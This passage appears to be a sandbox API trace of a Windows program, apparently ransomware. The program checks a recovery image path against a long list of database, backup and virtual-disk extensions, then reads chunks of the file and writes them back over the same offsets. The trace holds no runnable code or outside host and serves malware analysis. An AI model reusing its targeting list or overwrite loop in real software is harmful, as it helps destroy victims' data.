(lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".jet") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".jtx") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".kdb") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".kexi") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".kexic") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".kexis") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".lgc") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".lwx") returned 0x0 [0141.561] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".maf") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".maq") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mar") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mas") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mav") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mdb") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mdf") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mpd") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mrg") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mud") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mwb") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".myd") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ndf") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nnt") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nrmlib") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ns2") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ns3") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".ns4") returned 0x0 [0141.562] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nsf") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nv") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nv2") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nwdb") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nyf") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".odb") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".oqy") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".orx") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".owc") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".p96") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".p97") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".pan") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".pdb") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".pdm") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".pnz") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".qry") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".qvd") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rbf") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rctd") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rod") returned 0x0 [0141.563] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rodx") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rpd") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".rsd") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sas7bdat") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sbf") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".scx") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sdb") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sdc") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sdf") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sis") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".spq") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sql") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sqlite") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sqlite3") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".sqlitedb") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".te") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".temx") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".tmd") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".tps") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".trc") returned 0x0 [0141.564] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".trm") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".udb") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".udl") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".usr") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".v12") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vis") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vpd") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vvv") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".wdb") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".wmdb") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".wrk") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".xdb") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".xld") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".xmlff") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".abcddb") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".abs") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".abx") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".accdw") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".adn") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".db2") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".fm5") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".hjt") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".icg") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".icr") returned 0x0 [0141.565] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".kdb") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".lut") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".maw") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mdn") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".mdt") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vdi") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vhd") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmdk") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".pvm") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmem") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmsn") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmsd") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".nvram") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmx") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".raw") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".qcow2") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".subvol") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".bin") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vsv") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".avhd") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmrs") returned 0x0 [0141.566] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vhdx") returned 0x0 [0141.567] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".avdx") returned 0x0 [0141.567] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".vmcx") returned 0x0 [0141.567] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpSrch=".iso") returned 0x0 [0141.567] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.567] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.591] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.591] SetEndOfFile (hFile=0x6cc) returned 1 [0141.591] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.591] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0141.798] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.798] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0141.952] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0142.351] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.351] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0142.431] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0142.523] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.523] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0142.598] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x12332e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x12332e, lpOverlapped=0x0) returned 1 [0142.631] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffedccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.631] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x12332e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x12332e, lpOverlapped=0x0) returned 1 [0142.649] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x102332e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.649] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0143.127] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.127] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0143.217] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0143.806] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.806] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0144.121] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0146.554] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.554] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0146.638] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x12332e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x12332e, lpOverlapped=0x0) returned 1 [0146.652] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffedccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.652] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x12332e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x12332e, lpOverlapped=0x0) returned 1 [0146.660] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x102332e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.660] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0146.872] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.872] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0146.940] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0147.915] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.915] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0148.265] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0148.879] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.879] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0149.356] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x12332e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x12332e, lpOverlapped=0x0) returned 1 [0149.370] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffedccd2, lpNewFilePointer=0xffffffff, 